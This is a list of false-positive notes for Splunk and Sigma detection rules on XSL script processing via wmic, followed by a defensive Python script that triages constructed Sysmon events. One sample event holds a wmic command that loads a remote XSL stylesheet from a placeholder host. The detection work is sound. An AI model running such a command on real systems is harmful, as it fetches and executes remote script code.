LoFP
t1220
Title: False positives are limited, as legitimate applications typically do not download files or XSL stylesheets using wmic. Filter as needed.
Tags: t1220, endpoint, splunk

Title: msxsl is not installed by default and is deprecated, so it is unlikely to be present on most systems.
Tags: t1220, windows, sigma

Title: The image load event alone does not carry enough information in this case. Look at the recent process creation events that spawned the wmic process and investigate its command line and parent/child processes to get more insight.
Tags: t1220, windows, sigma

Title: Static /format: arguments (wmic's built-in output formats) - https://petri.com/command-line-wmi-part-3
Tags: t1220, windows, sigma

Title: The command wmic os get lastbootuptime loads vbscript.dll.
Tags: t1220, windows, sigma

Title: The command wmic os get locale loads vbscript.dll.
Tags: t1220, windows, sigma

Title: wmic.exe false positives depend on the scripts and administrative methods used in the monitored environment.
Tags: t1220, windows, sigma
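As an added example (not code from the LoFP page or from any of the Splunk/Sigma rules it summarizes), the following Python triage script applies the false-positive notes above to constructed process creation and image load events. It allow-lists wmic's built-in /format: names (the page only calls them "static format arguments" and cites the petri article; the concrete list of names is an assumption), flags any other target such as a URL or a local .xsl file, and, for vbscript.dll loads by wmic.exe, pivots to the process creation event with the same ProcessGuid, as the Sigma note recommends, to check whether the command line is one of the two queries the page lists as legitimately loading that DLL. Field names (ProcessGuid, Image, CommandLine, ImageLoaded) follow Sysmon-style naming and the sample events are constructed.

```python
"""Triage helpers for T1220 (XSL Script Processing) alerts on wmic.exe.

Added example, not the LoFP page's or any rule's own code. The events
below are constructed; BUILTIN_FORMATS is an assumed allow-list.
"""
import re
from typing import Optional

# Assumption: wmic's built-in /format: output names. The page only calls
# them "static format arguments"; this enumeration is not taken from it.
BUILTIN_FORMATS = {
    "csv", "hform", "htable", "htable-sortby", "list", "mof", "rawxml",
    "table", "texttable", "textvaluelist", "value", "xml",
}

# (alias, property) pairs the page lists as legitimately loading vbscript.dll.
KNOWN_VBSCRIPT_QUERIES = {("os", "lastbootuptime"), ("os", "locale")}

# /format:<target> or -format:<target>, target optionally double-quoted.
FORMAT_RE = re.compile(r'(?i)[/-]format:\s*"?([^"\s]+)"?')
# "wmic <alias> get <property>" with no further switches; image path optional.
GET_RE = re.compile(r'(?i)^\s*(?:.*\\)?wmic(?:\.exe)?\s+(\w+)\s+get\s+(\w+)\s*$')


def format_target(cmdline: str) -> Optional[str]:
    """Return the lower-cased /format: target, or None if the switch is absent."""
    m = FORMAT_RE.search(cmdline)
    return m.group(1).strip("'\"").lower() if m else None


def classify_proc_creation(cmdline: str) -> str:
    """Process-creation filter from the Splunk/Sigma notes.

    'static-format': built-in name such as /format:list (benign per the page).
    'xsl-or-url':    anything else, i.e. a URL, UNC path or local .xsl file.
    'no-format':     no /format: switch at all.
    """
    target = format_target(cmdline)
    if target is None:
        return "no-format"
    return "static-format" if target in BUILTIN_FORMATS else "xsl-or-url"


def triage_vbscript_load(load_event: dict, proc_index: dict) -> str:
    """Decide what to do with a vbscript.dll ImageLoad by wmic.exe.

    The load event alone is not enough, so the spawning process-creation
    event (same ProcessGuid) supplies the command line to judge.
    """
    if not load_event["ImageLoaded"].lower().endswith("\\vbscript.dll"):
        return "not-vbscript"
    proc = proc_index.get(load_event["ProcessGuid"])
    if proc is None:
        return "no-process-context"        # cannot explain the load: escalate
    m = GET_RE.match(proc["CommandLine"])
    if m and (m.group(1).lower(), m.group(2).lower()) in KNOWN_VBSCRIPT_QUERIES:
        return "known-benign-query"
    if classify_proc_creation(proc["CommandLine"]) == "xsl-or-url":
        return "escalate"
    return "review-parent-and-children"   # unexplained: pivot on parent/child


def run_triage(proc_events: list, load_events: list) -> dict:
    """Return {'proc': {guid: verdict}, 'load': {guid: verdict}}."""
    proc_index = {e["ProcessGuid"]: e for e in proc_events}
    return {
        "proc": {g: classify_proc_creation(e["CommandLine"]) for g, e in proc_index.items()},
        "load": {e["ProcessGuid"]: triage_vbscript_load(e, proc_index) for e in load_events},
    }


WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
PROC_EVENTS = [  # constructed Sysmon-style process creation records
    {"ProcessGuid": "{G1}", "Image": WMIC, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic os get lastbootuptime"},
    {"ProcessGuid": "{G2}", "Image": WMIC, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic process list brief /format:list"},
    {"ProcessGuid": "{G3}", "Image": WMIC, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'wmic os get /format:"https://example.invalid/update.xsl"'},
    {"ProcessGuid": "{G4}", "Image": WMIC, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "wmic os get caption"},
]
LOAD_EVENTS = [  # constructed Sysmon-style image load records; {G9} has no parent record
    {"ProcessGuid": g, "Image": WMIC, "ImageLoaded": r"C:\Windows\System32\vbscript.dll"}
    for g in ("{G1}", "{G3}", "{G4}", "{G9}")
]

if __name__ == "__main__":
    for kind, results in run_triage(PROC_EVENTS, LOAD_EVENTS).items():
        for guid, verdict in results.items():
            print(f"{kind:4} {guid} {verdict}")
```

Only the two queries the page names are treated as explained vbscript.dll loads; any other wmic command line that loads the DLL falls through to the parent/child review the Sigma note asks for, and a missing process creation record is surfaced rather than silently ignored, since that gap is exactly what makes the image load event alone unreliable.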